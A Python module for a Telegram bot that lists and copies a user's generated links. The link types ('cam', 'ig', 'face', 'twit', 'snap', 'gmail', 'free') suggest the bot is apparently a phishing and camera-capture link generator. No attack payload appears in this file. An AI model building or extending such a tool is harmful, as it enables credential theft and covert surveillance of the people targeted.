from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
from bot.utils.storage import link_cache

def handle_all_links(bot, message, get_bottom_buttons):
    user_id = message.chat.id
    
    # Find all links generated by this user
    user_links = []
    for key, val in link_cache.items():
        if str(val.get("user_id")) == str(user_id):
            link_type = val.get("type", "unknown")
            link_url = f"{val.get('base_url', '')}/p/{key}?v={user_id}"  # Construct full URL
            # Try to get full link from cache or construct
            if 'link' in val:
                link_url = val['link']
            user_links.append((link_type, link_url))
    
    if not user_links:
        bot.send_message(
            user_id,
            "📭 *No links found.*\n\nGenerate some links first using the buttons below.",
            reply_markup=get_bottom_buttons(),
            parse_mode="Markdown"
        )
        return
    
    # Prepare message
    message_text = "🔗 *Your Generated Links:*\n\n"
    for link_type, link_url in user_links:
        emoji = {
            'cam': '📸', 'ig': '📸', 'face': '📘', 
            'twit': '🐦', 'snap': '👻', 'gmail': '📧', 
            'free': '🎮'
        }.get(link_type, '🔗')
        message_text += f"{emoji} *{link_type.upper()}*: `{link_url}`\n\n"
    
    # Add copy button
    markup = InlineKeyboardMarkup(row_width=1)
    markup.add(
        InlineKeyboardButton("📋 Copy All Links", callback_data="copy_all")
    )
    
    bot.send_message(
        user_id,
        message_text,
        reply_markup=markup,
        parse_mode="Markdown"
    )

def handle_copy_all(bot, call):
    user_id = call.from_user.id
    
    # Get all links again
    user_links = []
    for key, val in link_cache.items():
        if str(val.get("user_id")) == str(user_id):
            link_url = val.get('link', '')
            if link_url:
                user_links.append(link_url)
    
    if not user_links:
        bot.answer_callback_query(call.id, "❌ No links to copy!")
        return
    
    # Combine all links into one text
    all_links_text = "\n".join(user_links)
    
    # Send as code block for easy copy
    bot.send_message(
        user_id,
        f"📋 *All your links (copy them below):*\n\n```\n{all_links_text}\n```",
        parse_mode="Markdown"
    )
    bot.answer_callback_query(call.id, "✅ Links sent! Copy them from the message above.")
